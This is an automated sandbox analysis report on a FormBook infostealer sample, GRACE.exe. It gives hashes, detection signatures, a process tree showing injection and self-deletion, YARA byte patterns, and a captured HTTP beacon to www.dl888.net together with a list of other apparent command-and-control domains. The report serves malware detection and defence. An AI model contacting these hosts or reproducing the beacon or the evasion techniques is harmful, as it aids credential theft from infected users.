
Analysis Report GRACE.exe

Overview

General Information

Sample Name: GRACE.exe
Analysis ID: 344817
MD5: 9034acbb2742281523525d715a4ee566
SHA1: 605948c4bcd7a0290e46a37d841a09ab43fbec86
SHA256: cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
Tags: COVID-19, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • GRACE.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\GRACE.exe' MD5: 9034ACBB2742281523525D715A4EE566)
    • AddInProcess32.exe (PID: 6508 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 404 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 2436 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings

Source: 10.2.AddInProcess32.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 10.2.AddInProcess32.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 10.2.AddInProcess32.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 10.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: GRACE.exe | Virustotal: Detection: 62%
Source: GRACE.exe | Metadefender: Detection: 16%
Source: GRACE.exe | ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: GRACE.exe | Joe Sandbox ML: detected
Source: 10.2.AddInProcess32.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: GRACE.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: GRACE.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
          Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
          Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then jmp 06CE2656h
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: global traffic | HTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1 | Host: www.dl888.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: global traffic | HTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1 | Host: www.dl888.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.dl888.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1308 | Content-Type: text/html | Server: Microsoft-IIS/6.0 | X-Powered-By: ASP.NET | Date: Wed, 27 Jan 2021 06:58:37 GMT | Connection: close
Source: explorer.exe, 00000010.00000003.552552225.000000000F704000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adb
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado/1
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cobj
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/www.luxusgrotte.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.dl888.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.dl888.net/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.dl888.net/jqc/www.hongreng.xyz
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.dl888.netReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fitdramas.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fitdramas.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fitdramas.com/jqc/www.szyulics.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fitdramas.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz/jqc/www.hotvidzhub.download
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyzReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/www.kornteengoods.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.downloadReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net/jqc/www.fitdramas.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.netReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/www.ludisenofloral.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com/jqc/www.11sxsx.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com/jqc/www.sterlworldshop.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/www.quintred.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/www.kimberlygoedhart.net
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.internetmarkaching.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com/jqc/M
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com/jqc/www.novergi.com
